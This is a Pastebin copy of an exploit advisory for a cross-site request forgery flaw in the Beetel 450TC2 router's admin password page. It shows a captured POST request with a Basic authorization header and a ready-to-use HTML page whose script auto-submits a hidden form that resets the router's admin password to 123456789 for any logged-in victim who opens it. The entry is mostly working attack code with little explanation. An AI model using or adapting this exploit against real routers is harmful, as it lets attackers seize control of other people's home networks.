Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Full title Beetel 450TC2 Router Admin Password CSRF Vulnerability
- Date add 2014-05-01
- Category web applications
- Platform hardware
- Risk <font color="#A5DF00">Security Risk Low</font>
- ============================================
- <!--
- # Exploit Title: Beetel 450TC2 Router Admin Password Cross Site Request
- Forgery Vulnerability
- # Date: 30/04/2014
- # Exploit Author: shyamkumar somana
- # Vendor Homepage: www.beetel.in
- # Version: 450TC2 - Firmware version : TX6-0Q-005_retail
- # Tested on: Windows 8
- #Beetel 450TC2 Router is vulnerable for cross site request forgery
- vulnerability in change password page.
- #Affected Resource/Form : Forms/tools_admin_1
- ###################################################################################
- Post Request:
- POST /Forms/tools_admin_1 HTTP/1.1
- Host: 192.168.1.1
- User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101
- Firefox/29.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://192.168.1.1/maintenance/tools_admin.htm
- Authorization: Basic YWRtaW46c3lhbXNvbWFuYQ==
- Connection: keep-alive
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 60
- uiViewTools_Password=NEW_PASSWORD&uiViewTools_PasswordConfirm=NEW_PASSWORD
- ###################################################################################
- #Exploit:
- -->
- <html>
- <body>
- <form action="http://192.168.1.1/Forms/tools_admin_1" method="POST">
- <input type="hidden" name="uiViewTools_Password" value="123456789" />
- <input type="hidden" name="uiViewTools_PasswordConfirm" value="123456789" />
- <input type="submit" value="Submit form" />
- </form>
- <script>
- document.forms[0].submit();
- </script>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement